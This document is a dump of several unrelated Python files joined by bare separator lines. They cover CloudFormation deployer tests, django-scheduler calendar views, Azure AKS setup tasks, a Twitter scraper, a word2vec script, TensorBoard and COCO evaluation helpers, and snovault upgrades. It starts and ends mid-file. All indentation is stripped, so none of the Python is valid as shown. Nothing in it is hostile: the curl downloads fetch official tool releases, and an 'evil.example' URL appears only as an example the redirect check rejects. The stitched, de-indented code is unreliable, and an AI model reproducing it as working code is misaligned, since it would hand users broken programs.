role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.assertEqual(self.deployer._client.create_stack.call_count, 1)
self.deployer._client.create_stack.assert_called_with(
Capabilities=["CAPABILITY_IAM"],
NotificationARNs=[],
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
RoleARN="role-arn",
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
def test_sync_create_stack_exception(self):
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer.wait_for_execute = MagicMock()
self.deployer._client.create_stack = MagicMock(side_effect=Exception)
with self.assertRaises(DeployFailedError):
self.deployer.sync(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_process_kwargs(self):
kwargs = {"Capabilities": []}
capabilities = ["CAPABILITY_IAM"]
role_arn = "role-arn"
notification_arns = ["arn"]
expected = {
"Capabilities": ["CAPABILITY_IAM"],
"RoleARN": "role-arn",
"NotificationARNs": ["arn"],
}
result = self.deployer._process_kwargs(kwargs, None, capabilities, role_arn, notification_arns)
self.assertEqual(expected, result)
|
python
|
import datetime
import dateutil.parser
import pytz
from django.conf import settings
from django.db.models import F, Q
from django.http import (
Http404, HttpResponseBadRequest, HttpResponseRedirect, JsonResponse,
)
from django.shortcuts import get_object_or_404
from django.urls import reverse
from django.utils import timezone
from django.utils.http import is_safe_url
from django.utils.six.moves.urllib.parse import quote
from django.views.decorators.http import require_POST
from django.views.generic.base import TemplateResponseMixin
from django.views.generic.detail import DetailView
from django.views.generic.edit import (
CreateView, DeleteView, ModelFormMixin, ProcessFormView, UpdateView,
)
from schedule.forms import EventForm, OccurrenceForm
from schedule.models import Calendar, Event, Occurrence
from schedule.periods import weekday_names
from schedule.settings import (
CHECK_EVENT_PERM_FUNC, CHECK_OCCURRENCE_PERM_FUNC, EVENT_NAME_PLACEHOLDER,
GET_EVENTS_FUNC, OCCURRENCE_CANCEL_REDIRECT, USE_FULLCALENDAR,
)
from schedule.utils import (
check_calendar_permissions, check_event_permissions,
check_occurrence_permissions, coerce_date_dict,
)
class CalendarViewPermissionMixin(object):
@classmethod
def as_view(cls, **initkwargs):
view = super(CalendarViewPermissionMixin, cls).as_view(**initkwargs)
return check_calendar_permissions(view)
class EventEditPermissionMixin(object):
@classmethod
def as_view(cls, **initkwargs):
view = super(EventEditPermissionMixin, cls).as_view(**initkwargs)
return check_event_permissions(view)
class OccurrenceEditPermissionMixin(object):
@classmethod
def as_view(cls, **initkwargs):
view = super(OccurrenceEditPermissionMixin, cls).as_view(**initkwargs)
return check_occurrence_permissions(view)
class CancelButtonMixin(object):
def post(self, request, *args, **kwargs):
next_url = kwargs.get('next')
self.success_url = get_next_url(request, next_url)
if "cancel" in request.POST:
return HttpResponseRedirect(self.success_url)
else:
return super(CancelButtonMixin, self).post(request, *args, **kwargs)
class CalendarMixin(CalendarViewPermissionMixin):
model = Calendar
slug_url_kwarg = 'calendar_slug'
class CalendarView(CalendarMixin, DetailView):
template_name = 'schedule/calendar.html'
class FullCalendarView(CalendarMixin, DetailView):
template_name = "fullcalendar.html"
def get_context_data(self, **kwargs):
context = super(FullCalendarView, self).get_context_data()
context['calendar_slug'] = self.kwargs.get('calendar_slug')
return context
class CalendarByPeriodsView(CalendarMixin, DetailView):
template_name = 'schedule/calendar_by_period.html'
def get_context_data(self, **kwargs):
context = super(CalendarByPeriodsView, self).get_context_data(**kwargs)
calendar = self.object
period_class = self.kwargs['period']
try:
date = coerce_date_dict(self.request.GET)
except ValueError:
raise Http404
if date:
try:
date = datetime.datetime(**date)
except ValueError:
raise Http404
else:
date = timezone.now()
event_list = GET_EVENTS_FUNC(self.request, calendar)
local_timezone = timezone.get_current_timezone()
period = period_class(event_list, date, tzinfo=local_timezone)
context.update({
'date': date,
'period': period,
'calendar': calendar,
'weekday_names': weekday_names,
'here': quote(self.request.get_full_path()),
})
return context
class OccurrenceMixin(CalendarViewPermissionMixin, TemplateResponseMixin):
model = Occurrence
pk_url_kwarg = 'occurrence_id'
form_class = OccurrenceForm
class OccurrenceEditMixin(CancelButtonMixin, OccurrenceEditPermissionMixin, OccurrenceMixin):
def get_initial(self):
initial_data = super(OccurrenceEditMixin, self).get_initial()
_, self.object = get_occurrence(**self.kwargs)
return initial_data
class OccurrenceView(OccurrenceMixin, DetailView):
template_name = 'schedule/occurrence.html'
class OccurrencePreview(OccurrenceMixin, ModelFormMixin, ProcessFormView):
template_name = 'schedule/occurrence.html'
def get_context_data(self, **kwargs):
context = super(OccurrencePreview, self).get_context_data()
context = {
'event': self.object.event,
'occurrence': self.object,
}
return context
class EditOccurrenceView(OccurrenceEditMixin, UpdateView):
template_name = 'schedule/edit_occurrence.html'
class CreateOccurrenceView(OccurrenceEditMixin, CreateView):
template_name = 'schedule/edit_occurrence.html'
class CancelOccurrenceView(OccurrenceEditMixin, ModelFormMixin, ProcessFormView):
template_name = 'schedule/cancel_occurrence.html'
def post(self, request, *args, **kwargs):
event, occurrence = get_occurrence(**kwargs)
self.success_url = kwargs.get(
'next',
get_next_url(request, event.get_absolute_url()))
if 'cancel' not in request.POST:
occurrence.cancel()
return HttpResponseRedirect(self.success_url)
class EventMixin(CalendarViewPermissionMixin):
model = Event
pk_url_kwarg = 'event_id'
class EventEditMixin(CancelButtonMixin, EventEditPermissionMixin, EventMixin):
pass
class EventView(EventMixin, DetailView):
template_name = 'schedule/event.html'
class EditEventView(EventEditMixin, UpdateView):
form_class = EventForm
template_name = 'schedule/create_event.html'
def form_valid(self, form):
event = form.save(commit=False)
old_event = Event.objects.get(pk=event.pk)
dts = datetime.timedelta(
minutes=int((event.start - old_event.start).total_seconds() / 60)
)
dte = datetime.timedelta(
minutes=int((event.end - old_event.end).total_seconds() / 60)
)
event.occurrence_set.all().update(
original_start=F('original_start') + dts,
original_end=F('original_end') + dte,
)
event.save()
return super(EditEventView, self).form_valid(form)
class CreateEventView(EventEditMixin, CreateView):
form_class = EventForm
template_name = 'schedule/create_event.html'
def get_initial(self):
date = coerce_date_dict(self.request.GET)
initial_data = None
if date:
try:
start = datetime.datetime(**date)
initial_data = {
'start': start,
'end': start + datetime.timedelta(minutes=30)
}
except TypeError:
raise Http404
except ValueError:
raise Http404
return initial_data
def form_valid(self, form):
event = form.save(commit=False)
event.creator = self.request.user
event.calendar = get_object_or_404(Calendar, slug=self.kwargs['calendar_slug'])
event.save()
return HttpResponseRedirect(event.get_absolute_url())
class DeleteEventView(EventEditMixin, DeleteView):
template_name = 'schedule/delete_event.html'
def get_context_data(self, **kwargs):
ctx = super(DeleteEventView, self).get_context_data(**kwargs)
ctx['next'] = self.get_success_url()
return ctx
def get_success_url(self):
"""
After the event is deleted there are three options for redirect, tried in
this order:
# Try to find a 'next' GET variable
# If the key word argument redirect is set
# Lastly redirect to the event detail of the recently create event
"""
url_val = 'fullcalendar' if USE_FULLCALENDAR else 'day_calendar'
next_url = self.kwargs.get('next') or reverse(url_val, args=[self.object.calendar.slug])
next_url = get_next_url(self.request, next_url)
return next_url
def get_occurrence(event_id, occurrence_id=None, year=None, month=None,
day=None, hour=None, minute=None, second=None,
tzinfo=None):
"""
Because occurrences don't have to be persisted, there must be two ways to
retrieve them. both need an event, but if its persisted the occurrence can
be retrieved with an id. If it is not persisted it takes a date to
retrieve it. This function returns an event and occurrence regardless of
which method is used.
"""
if occurrence_id:
occurrence = get_object_or_404(Occurrence, id=occurrence_id)
event = occurrence.event
elif None not in (year, month, day, hour, minute, second):
event = get_object_or_404(Event, id=event_id)
date = timezone.make_aware(datetime.datetime(int(year), int(month),
int(day), int(hour), int(minute),
int(second)), tzinfo)
occurrence = event.get_occurrence(date)
if occurrence is None:
raise Http404
else:
raise Http404
return event, occurrence
def check_next_url(next_url):
"""
Checks to make sure the next url is not redirecting to another page.
Basically it is a minimal security check.
"""
if not next_url or '://' in next_url:
return None
return next_url
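# For example (illustrative values): check_next_url("http://evil.example/next")
# returns None because the URL contains "://", while check_next_url("/calendar/daily/")
# is returned unchanged.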
def get_next_url(request, default):
next_url = default
if OCCURRENCE_CANCEL_REDIRECT:
next_url = OCCURRENCE_CANCEL_REDIRECT
_next_url = request.GET.get('next') if request.method in ['GET', 'HEAD'] else request.POST.get('next')
if _next_url and is_safe_url(url=_next_url, host=request.get_host()):
next_url = _next_url
return next_url
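# Resolution order (as implemented above): start from the supplied default, let
# OCCURRENCE_CANCEL_REDIRECT override it when set, and finally prefer a safe
# "next" parameter taken from the GET or POST data.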
@check_calendar_permissions
def api_occurrences(request):
start = request.GET.get('start')
end = request.GET.get('end')
calendar_slug = request.GET.get('calendar_slug')
timezone = request.GET.get('timezone')
try:
response_data = _api_occurrences(start, end, calendar_slug, timezone)
except (ValueError, Calendar.DoesNotExist) as e:
return HttpResponseBadRequest(e)
return JsonResponse(response_data, safe=False)
def _api_occurrences(start, end, calendar_slug, timezone):
if not start or not end:
raise ValueError('Start and end parameters are required')
# version 2 of fullcalendar
# TODO: improve this code with the dateutil package
if '-' in start:
def convert(ddatetime):
if ddatetime:
ddatetime = ddatetime.split(' ')[0]
try:
return datetime.datetime.strptime(ddatetime, '%Y-%m-%d')
except ValueError:
# try a different date string format first before failing
return datetime.datetime.strptime(ddatetime, '%Y-%m-%dT%H:%M:%S')
else:
def convert(ddatetime):
return datetime.datetime.utcfromtimestamp(float(ddatetime))
start = convert(start)
end = convert(end)
current_tz = False
if timezone and timezone in pytz.common_timezones:
# make start and end dates aware in given timezone
current_tz = pytz.timezone(timezone)
start = current_tz.localize(start)
end = current_tz.localize(end)
elif settings.USE_TZ:
# If USE_TZ is True, make start and end dates aware in UTC timezone
utc = pytz.UTC
start = utc.localize(start)
end = utc.localize(end)
if calendar_slug:
# will raise DoesNotExist exception if no match
calendars = [Calendar.objects.get(slug=calendar_slug)]
# if no calendar slug is given, get all the calendars
else:
calendars = Calendar.objects.all()
response_data = []
# Algorithm to get an id for the occurrences in fullcalendar (NOT THE SAME
# AS IN THE DB) which is always unique.
# Fullcalendar treats all of its "events" with the same "event.id" as the
# same object, because it is not really built around the idea of events
# (generators) and occurrences (their events).
# Check the "existed" boolean value that tells it whether to change the
# event, using the "event_id", or the occurrence with the specified "id".
# For more info see https://github.com/llazzaro/django-scheduler/pull/169
i = 1
if Occurrence.objects.all().count() > 0:
i = Occurrence.objects.latest('id').id + 1
event_list = []
for calendar in calendars:
# create flat list of events from each calendar
event_list += calendar.events.filter(start__lte=end).filter(
Q(end_recurring_period__gte=start) |
Q(end_recurring_period__isnull=True))
for event in event_list:
occurrences = event.get_occurrences(start, end)
for occurrence in occurrences:
occurrence_id = i + occurrence.event.id
existed = False
if occurrence.id:
occurrence_id = occurrence.id
existed = True
recur_rule = occurrence.event.rule.name \
if occurrence.event.rule else None
if occurrence.event.end_recurring_period:
recur_period_end = occurrence.event.end_recurring_period
if current_tz:
# make recur_period_end aware in the given timezone
recur_period_end = recur_period_end.astimezone(current_tz)
else:
recur_period_end = None
event_start = occurrence.start
event_end = occurrence.end
if current_tz:
# make event start and end dates aware in given timezone
event_start = event_start.astimezone(current_tz)
event_end = event_end.astimezone(current_tz)
response_data.append({
'id': occurrence_id,
'title': occurrence.title,
'start': event_start,
'end': event_end,
'existed': existed,
'event_id': occurrence.event.id,
'color': occurrence.event.color_event,
'description': occurrence.description,
'rule': recur_rule,
'end_recurring_period': recur_period_end,
'creator': str(occurrence.event.creator),
'calendar': occurrence.event.calendar.slug,
'cancelled': occurrence.cancelled,
})
return response_data
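# Each entry appended above is serialised by JsonResponse for fullcalendar; an
# illustrative (made-up) entry looks like:
#   {"id": 42, "title": "Demo", "start": <datetime>, "end": <datetime>,
#    "existed": True, "event_id": 7, "rule": None, "cancelled": False, ...}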
@require_POST
@check_calendar_permissions
def api_move_or_resize_by_code(request):
response_data = {}
user = request.user
id = request.POST.get('id')
existed = bool(request.POST.get('existed') == 'true')
delta = datetime.timedelta(minutes=int(request.POST.get('delta')))
resize = bool(request.POST.get('resize', False))
event_id = request.POST.get('event_id')
response_data = _api_move_or_resize_by_code(
user,
id,
existed,
delta,
resize,
event_id)
return JsonResponse(response_data)
def _api_move_or_resize_by_code(user, id, existed, delta, resize, event_id):
response_data = {}
response_data['status'] = "PERMISSION DENIED"
if existed:
occurrence = Occurrence.objects.get(id=id)
occurrence.end += delta
if not resize:
occurrence.start += delta
if CHECK_OCCURRENCE_PERM_FUNC(occurrence, user):
occurrence.save()
response_data['status'] = "OK"
else:
event = Event.objects.get(id=event_id)
dts = 0
dte = delta
if not resize:
event.start += delta
dts = delta
event.end = event.end + delta
if CHECK_EVENT_PERM_FUNC(event, user):
event.save()
event.occurrence_set.all().update(
original_start=F('original_start') + dts,
original_end=F('original_end') + dte,
)
response_data['status'] = "OK"
return response_data
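# Summary of the branch above: when the occurrence already exists it alone is moved
# (or resized), otherwise the parent event and all of its persisted occurrences are
# shifted by the same delta, subject to the permission-check functions.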
@require_POST
@check_calendar_permissions
def api_select_create(request):
response_data = {}
start = request.POST.get('start')
end = request.POST.get('end')
calendar_slug = request.POST.get('calendar_slug')
response_data = _api_select_create(start, end, calendar_slug)
return JsonResponse(response_data)
def _api_select_create(start, end, calendar_slug):
start = dateutil.parser.parse(start)
end = dateutil.parser.parse(end)
calendar = Calendar.objects.get(slug=calendar_slug)
Event.objects.create(
start=start,
end=end,
title=EVENT_NAME_PLACEHOLDER,
calendar=calendar,
)
response_data = {}
response_data['status'] = "OK"
return response_data
|
python
|
from invoke import task
from os.path import join, exists
from os import makedirs
from shutil import copy, rmtree
from subprocess import run
from tasks.util.env import (
BIN_DIR,
GLOBAL_BIN_DIR,
KUBECTL_BIN,
AZURE_RESOURCE_GROUP,
AZURE_VM_SIZE,
AKS_CLUSTER_NODE_COUNT,
AKS_CLUSTER_NAME,
)
from tasks.util.version import get_k8s_version
# Note - this must match the version used by Faasm
KNATIVE_VERSION = "0.24.0"
K9S_VERSION = "0.24.15"
# AKS commandline reference here:
# https://docs.microsoft.com/en-us/cli/azure/aks?view=azure-cli-latest
def _run_aks_cmd(name, az_args=None):
cmd = [
"az",
"aks {}".format(name),
"--resource-group {}".format(AZURE_RESOURCE_GROUP),
]
if az_args:
cmd.extend(az_args)
cmd = " ".join(cmd)
print(cmd)
run(cmd, shell=True, check=True)
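# For example, _run_aks_cmd("list") composes and runs:
#   az aks list --resource-group <AZURE_RESOURCE_GROUP>
# and any extra az_args are appended after the resource-group flag.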
@task
def list(ctx):
"""
List all AKS resources
"""
_run_aks_cmd("list")
@task
def provision(ctx):
"""
Provision the AKS cluster
"""
k8s_ver = get_k8s_version()
_run_aks_cmd(
"create",
[
"--name {}".format(AKS_CLUSTER_NAME),
"--node-count {}".format(AKS_CLUSTER_NODE_COUNT),
"--node-vm-size {}".format(AZURE_VM_SIZE),
"--kubernetes-version {}".format(k8s_ver),
"--generate-ssh-keys",
],
)
@task
def details(ctx):
"""
Show the details of the cluster
"""
_run_aks_cmd(
"show",
[
"--name {}".format(AKS_CLUSTER_NAME),
],
)
@task
def delete(ctx):
"""
Delete the AKS cluster
"""
_run_aks_cmd(
"delete",
[
"--name {}".format(AKS_CLUSTER_NAME),
"--yes",
],
)
@task
def credentials(ctx):
"""
Get credentials for the AKS cluster
"""
# Set up the credentials
_run_aks_cmd(
"get-credentials",
[
"--name {}".format(AKS_CLUSTER_NAME),
"--overwrite-existing",
],
)
# Check we can access the cluster
cmd = "{} get nodes".format(KUBECTL_BIN)
print(cmd)
run(cmd, shell=True, check=True)
def _download_binary(url, binary_name):
makedirs(BIN_DIR, exist_ok=True)
cmd = "curl -LO {}".format(url)
run(cmd, shell=True, check=True, cwd=BIN_DIR)
run("chmod +x {}".format(binary_name), shell=True, check=True, cwd=BIN_DIR)
return join(BIN_DIR, binary_name)
def _symlink_global_bin(binary_path, name):
global_path = join(GLOBAL_BIN_DIR, name)
if exists(global_path):
print("Removing existing binary at {}".format(global_path))
run(
"sudo rm -f {}".format(global_path),
shell=True,
check=True,
)
print("Symlinking {} -> {}".format(global_path, binary_path))
run(
"sudo ln -s {} {}".format(binary_path, name),
shell=True,
check=True,
cwd=GLOBAL_BIN_DIR,
)
@task
def install_kubectl(ctx, system=False):
"""
Install the k8s CLI (kubectl)
"""
k8s_ver = get_k8s_version()
url = "https://dl.k8s.io/release/v{}/bin/linux/amd64/kubectl".format(
k8s_ver
)
binary_path = _download_binary(url, "kubectl")
# Symlink for kubectl globally
if system:
_symlink_global_bin(binary_path, "kubectl")
@task
def install_kn(ctx, system=False):
"""
Install the knative CLI (kn)
"""
url = "https://github.com/knative/client/releases/download/v{}/kn-linux-amd64".format(
KNATIVE_VERSION
)
binary_path = _download_binary(url, "kn-linux-amd64")
# Symlink for kn command locally
run("rm -f kn", shell=True, check=True, cwd=BIN_DIR)
run("ln -s {} kn".format(binary_path), shell=True, check=True, cwd=BIN_DIR)
# Symlink for kn command globally
if system:
_symlink_global_bin(binary_path, "kn")
@task
def install_k9s(ctx, system=False):
"""
Install the K9s CLI
"""
tar_name = "k9s_Linux_x86_64.tar.gz"
url = "https://github.com/derailed/k9s/releases/download/v{}/{}".format(
K9S_VERSION, tar_name
)
# Download the TAR
workdir = "/tmp/k9s"
makedirs(workdir, exist_ok=True)
cmd = "curl -LO {}".format(url)
run(cmd, shell=True, check=True, cwd=workdir)
# Untar
run("tar -xf {}".format(tar_name), shell=True, check=True, cwd=workdir)
# Copy k9s into place
binary_path = join(BIN_DIR, "k9s")
copy(join(workdir, "k9s"), binary_path)
# Remove tar
rmtree(workdir)
# Symlink for k9s command globally
if system:
_symlink_global_bin(binary_path, "k9s")
|
python
|
from typing import List
class ModelSearchCriteria:
    def __init__(self, datatable_names: List[str], column_names: List[str], search_text: str):
self.datatable_names = datatable_names
self.column_names = column_names
self.search_text = search_text
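# A minimal usage sketch (the table and column names below are hypothetical):
#   criteria = ModelSearchCriteria(
#       datatable_names=['users', 'orders'],
#       column_names=['name', 'email'],
#       search_text='alice',
#   )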
|
python
|
#!/usr/bin/python
# -*- coding: utf_8 -*-
"""Access and query Twitter's API with the simplistic twitter package (`pip install twitter`).
"""
from __future__ import print_function
from __future__ import unicode_literals
import csv
import os
import time
from twitter import OAuth
from twitter import Twitter
def setup_twitter(config_file='config.py'):
"""Setup auth keys and session with Twitter client."""
config = {}
execfile(config_file, config)
twitter_obj = Twitter(auth=OAuth(config["access_key"],
config["access_secret"],
config["consumer_key"],
config["consumer_secret"]))
return twitter_obj
def search_twitter(twitter_session, query, count=100, status='popular'):
"""Submit query to Twitter API via twitter package."""
status_options = ['mixed', 'recent', 'popular']
assert status in status_options, "'status' must be in {}.".format(status_options)
query = twitter_session.search.tweets(q=query,
lang='en',
                                          result_type=status,
count=count,
retry=True)
return query
def parse_twitter_response(twitter_response, min_rts=500, strip_non_ascii=True):
"""Extract requested variables from Twitter API response. Yield each tweet
one at a time with a generator. Available keys:
[u'contributors', u'truncated', u'text', u'is_quote_status',
u'in_reply_to_status_id', u'id', u'favorite_count', u'source',
u'retweeted', u'coordinates', u'entities', u'in_reply_to_screen_name',
u'in_reply_to_user_id', u'retweet_count', u'id_str', u'favorited',
u'retweeted_status', u'user', u'geo', u'in_reply_to_user_id_str',
u'possibly_sensitive', u'lang', u'created_at',
u'in_reply_to_status_id_str', u'place', u'metadata']
"""
for result in twitter_response['statuses']:
tweet_datetime = result['created_at']
text = result['text'].encode('utf_8')
if strip_non_ascii:
text = ''.join([i if ord(i) < 128 else ' ' for i in text])
# Strip 'RT ' from head of retweets, redundant
if text.startswith('RT '):
text = text[3:]
# Ch newlines to spaces
text = ''.join([' ' if c == '\n' else c for c in text])
rt_count = result['retweet_count']
yield {'_tweet_datetime': tweet_datetime,
'_text': text,
'_rt_count': rt_count}
def search_parse_write_tweets(query_str,
total_to_fetch,
status,
minimum_rts,
low_rt_threshold):
twitter = setup_twitter()
    query_response = search_twitter(twitter_session=twitter,
                                    query=query_str,
                                    count=total_to_fetch,
                                    status=status)
print("Search complete ({} seconds)".format(query_response["search_metadata"]["completed_in"]))
tweets_data = parse_twitter_response(query_response, min_rts=minimum_rts) # yields generator
fieldnames = []
if not fieldnames:
for row in tweets_data:
fieldnames = row.keys()
fieldnames_len = len(row.keys())
break
# Set up csv writers
file1 = 'tweets/tweets_popular.csv'
f1_write_header = False
if not os.path.isfile(file1):
f1_write_header = True
csv_popular_open = open(file1, 'ab')
csv_popular_writer = csv.DictWriter(csv_popular_open, delimiter=b'|', fieldnames=fieldnames)
if f1_write_header:
csv_popular_writer.writeheader()
file2 = 'tweets/tweets_not_popular.csv'
f2_write_header = False
if not os.path.isfile(file2):
f2_write_header = True
csv_not_popular_open = open(file2, 'ab')
csv_not_popular_writer = csv.DictWriter(csv_not_popular_open, delimiter=b'|', fieldnames=fieldnames)
if f2_write_header:
csv_not_popular_writer.writeheader()
# Loop thru generator of dicts, write row to right file
for tweet_data in tweets_data:
        if tweet_data['_rt_count'] >= minimum_rts:
if len(tweet_data.keys()) == fieldnames_len:
csv_popular_writer.writerow(tweet_data)
        elif tweet_data['_rt_count'] <= low_rt_threshold:
if len(tweet_data.keys()) == fieldnames_len:
csv_not_popular_writer.writerow(tweet_data)
if __name__ == '__main__':
TWEETS_TO_FETCH = 1000
query_string = 'the a u i me she you he they for rt at tweet'.split(' ')
query_disjunction = ' OR '.join(query_string)
#status = 'popular' # ['mixed', 'recent', 'popular']
minimum_rts = 500
low_rt_threshold = 10
while True:
time.sleep(60)
search_parse_write_tweets(query_str=query_disjunction,
total_to_fetch=TWEETS_TO_FETCH,
status='popular',
minimum_rts=minimum_rts,
low_rt_threshold=low_rt_threshold)
search_parse_write_tweets(query_str=query_disjunction,
total_to_fetch=TWEETS_TO_FETCH,
status='mixed',
minimum_rts=minimum_rts,
low_rt_threshold=low_rt_threshold)
|
python
|
import jieba
import jieba.analyse
from gensim.test.utils import get_tmpfile
import gensim.models.word2vec as word2vec
from path import Path
import argparse
from utils import readlines,SeqSubSeq,toarry
# File locations below should be changed to your own storage paths
# Segment the text into words
parser = argparse.ArgumentParser(description="process tree file to a doc")
parser.add_argument('--doc', default='./doc6.txt', help="Input file")
parser.add_argument('--doc_post', default='./doc_post.txt', help='output a txt describing file_in')
parser.add_argument('--seged_file',default='./conv19_segments.txt')
parser.add_argument('--stop_words_file',default='./stopwords.txt')
parser.add_argument('--model_file',default='./word2vec.model')
parser.add_argument('--node_list_file', default='./array.txt', help='output a txt describing file_in')
parser.add_argument('--seq_sub_seq_file', default='./seqsubseq.txt', help='output a txt describing file_in')
args = parser.parse_args()
file = Path('./doc_post.txt')
topn = 10
save_model=True
load_model=True
def stopwordslist(filepath):
stopwords = [line.strip() for line in open(filepath, 'r', encoding='utf-8').readlines()]
return stopwords
def preprocess(args):
'''
:param file_name: line_cluster file
:return:
'''
toarry(file_in=args.doc,file_out=args.node_list_file)
SeqSubSeq(file_in = args.node_list_file,file_out=args.seq_sub_seq_file)
file_name = Path(args.seq_sub_seq_file)
if not file_name.exists():
return
seq_sub_seq_file = Path(args.seq_sub_seq_file)
seq_sub_seq = readlines(seq_sub_seq_file)
src_file = Path(args.doc)
lines = readlines(src_file)
ret_line=[]
for line in lines:
ret_line.append(line[2:])
print(ret_line)
    post_process_txt = []
    post_process_line = []
    for line_arr in seq_sub_seq:
        if line_arr != '':
            for num_line in line_arr.split(','):
                post_process_line.append(ret_line[int(num_line)])
            post_process_txt.append(post_process_line.copy())
            post_process_line = []
doc_post = 'doc_post.txt'
with open(doc_post,'w',encoding='UTF-8') as txt:
txt.write(str(post_process_txt[0] )[1:-1])
for item in post_process_txt[1:]:
txt.write('\n'+str(item)[1:-1])
def Segment(args):
'''
    Segment the source document with jieba, dropping words found in the stopword list
    :return: none, writes the segmented text to the txt file seg_file
'''
stop_words_file = Path(args.stop_words_file)
seged_file = Path(args.seged_file)
stopwords = stopwordslist(stop_words_file)
outstr=''
with open(file,encoding='utf-8') as f:
document = f.read()
document_cut = jieba.cut_for_search(document)
for word in document_cut:
if word not in stopwords:
if word != '\t':
outstr += word
outstr += " "
with open(seged_file, 'w',encoding="utf-8") as f2:
f2.write(outstr)
def run(args):
seged_file = Path(args.seged_file)
sentences = word2vec.LineSentence(seged_file)
model_file = Path(args.model_file)
if load_model==True and model_file.exists():
model = word2vec.Word2Vec.load("word2vec.model")
else:
model = word2vec.Word2Vec(sentences, hs=3, min_count=5, window=10, size=100)
if save_model == True:
            #path = get_tmpfile("word2vec.model")  # create a temporary file
model.save(model_file)
vocabulary = model.wv.similar_by_word('治疗', topn=100)
for key in vocabulary:
print(key)
if __name__=='__main__':
preprocess(args)
Segment(args)
#run(args)
|
python
|
"""functions for working with tensorboard"""
from pathlib import Path
import pandas as pd
from tensorboard.backend.event_processing.event_accumulator import EventAccumulator
def logdir2df(logdir):
"""convert tensorboard events files in a logs directory into a pandas DataFrame
events files are created by SummaryWriter from PyTorch or Tensorflow
Parameters
----------
logdir : str, Path
path to directory containing tfevents file(s) saved by a SummaryWriter
Returns
-------
df : pandas.Dataframe
with columns 'step', 'wall_time', and all Scalars from the tfevents file
Notes
-----
adapted from
https://stackoverflow.com/questions/42355122/can-i-export-a-tensorflow-summary-to-csv
"""
if issubclass(type(logdir), Path): # subclass, because could be PosixPath or WindowsPath
logdir = str(logdir)
ea = EventAccumulator(path=logdir)
ea.Reload() # load all data written so far
scalar_tags = ea.Tags()['scalars'] # list of tags for values written to scalar
dfs = {}
for scalar_tag in scalar_tags:
dfs[scalar_tag] = pd.DataFrame(ea.Scalars(scalar_tag),
columns=["wall_time",
"step",
scalar_tag.replace('val/', '')])
dfs[scalar_tag] = dfs[scalar_tag].set_index("step")
dfs[scalar_tag].drop("wall_time", axis=1, inplace=True)
return pd.concat([v for k, v in dfs.items()], axis=1)
def logdir2csv(logdir):
"""convert tensorboard events files in a logs directory into a .csv file
Parameters
----------
logdir : str, Path
path to directory containing tfevents file(s) saved by a SummaryWriter
Returns
-------
None
"""
logdir = Path(logdir)
events_files = sorted(logdir.glob('*tfevents*'))
# remove .csv files -- we can just overwrite them
events_files = [path for path in events_files if not str(path).endswith('.csv')]
if len(events_files) != 1:
if len(events_files) < 1:
raise ValueError(
f'did not find any events files in {logdir}'
)
elif len(events_files) > 1:
raise ValueError(
f'found multiple events files in {logdir}:\n{events_files}.'
'Please ensure there is only one events file in the directory, '
'unclear which to use.'
)
else:
events_file = events_files[0]
df = logdir2df(logdir)
csv_path = events_file.stem + '.csv'
df.to_csv(logdir.joinpath(csv_path))
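# A minimal usage sketch (assuming a hypothetical log directory "runs/exp1" written by a
# SummaryWriter): logdir2df returns a DataFrame of all scalars indexed by step, while
# logdir2csv saves the same data next to the single events file in that directory.
#   df = logdir2df('runs/exp1')
#   logdir2csv('runs/exp1')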
|
python
|
import json
import logging
import os
from datetime import datetime
def coco_evaluation(dataset, predictions, output_dir, iteration=None):
coco_results = []
for i, prediction in enumerate(predictions):
img_info = dataset.get_img_info(i)
prediction = prediction.resize((img_info['width'], img_info['height'])).numpy()
boxes, labels, scores = prediction['boxes'], prediction['labels'], prediction['scores']
image_id, annotation = dataset.get_annotation(i)
class_mapper = dataset.contiguous_id_to_coco_id
if labels.shape[0] == 0:
continue
boxes = boxes.tolist()
labels = labels.tolist()
scores = scores.tolist()
coco_results.extend(
[
{
"image_id": image_id,
"category_id": class_mapper[labels[k]],
"bbox": [box[0], box[1], box[2] - box[0], box[3] - box[1]], # to xywh format
"score": scores[k],
}
for k, box in enumerate(boxes)
]
)
iou_type = 'bbox'
json_result_file = os.path.join(output_dir, iou_type + ".json")
logger = logging.getLogger("SSD.inference")
logger.info('Writing results to {}...'.format(json_result_file))
with open(json_result_file, "w") as f:
json.dump(coco_results, f)
from pycocotools.cocoeval import COCOeval
coco_gt = dataset.coco
coco_dt = coco_gt.loadRes(json_result_file)
coco_eval = COCOeval(coco_gt, coco_dt, iou_type)
coco_eval.evaluate()
coco_eval.accumulate()
coco_eval.summarize()
result_strings = []
keys = ["AP", "AP50", "AP75", "APs", "APm", "APl"]
metrics = {}
for i, key in enumerate(keys):
metrics[key] = coco_eval.stats[i]
logger.info('{:<10}: {}'.format(key, round(coco_eval.stats[i], 3)))
result_strings.append('{:<10}: {}'.format(key, round(coco_eval.stats[i], 3)))
if iteration is not None:
result_path = os.path.join(output_dir, 'result_{:07d}.txt'.format(iteration))
else:
result_path = os.path.join(output_dir, 'result_{}.txt'.format(datetime.now().strftime('%Y-%m-%d_%H-%M-%S')))
with open(result_path, "w") as f:
f.write('\n'.join(result_strings))
return dict(metrics=metrics)
|
python
|
from snovault import upgrade_step
@upgrade_step('suspension', '1', '2')
def suspension_1_2(value, system):
if 'biosample_ontology' in value:
del value['biosample_ontology']
@upgrade_step('suspension', '2', '3')
def suspension_2_3(value, system):
if 'url' in value:
value['urls'] = [value['url']]
del value['url']
@upgrade_step('suspension', '3', '4')
def suspension_3_4(value, system):
if 'dissociation_time' in value:
value['dissociation_time'] = str(value['dissociation_time'])
|
python
|
# -*- coding: utf-8 -*-
from django.conf.urls import url
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.test import TestCase, override_settings
from django.views.generic import CreateView, UpdateView, DeleteView, DetailView
class CreateUserView(CreateView):
model = User
fields = '__all__'
class UpdateUserView(UpdateView):
model = User
fields = '__all__'
class DeleteUserView(DeleteView):
model = User
class DetailUserView(DetailView):
model = User
fields = '__all__'
urlpatterns = [
url(r'^create-user/$', view=CreateUserView.as_view(), name='create-user'),
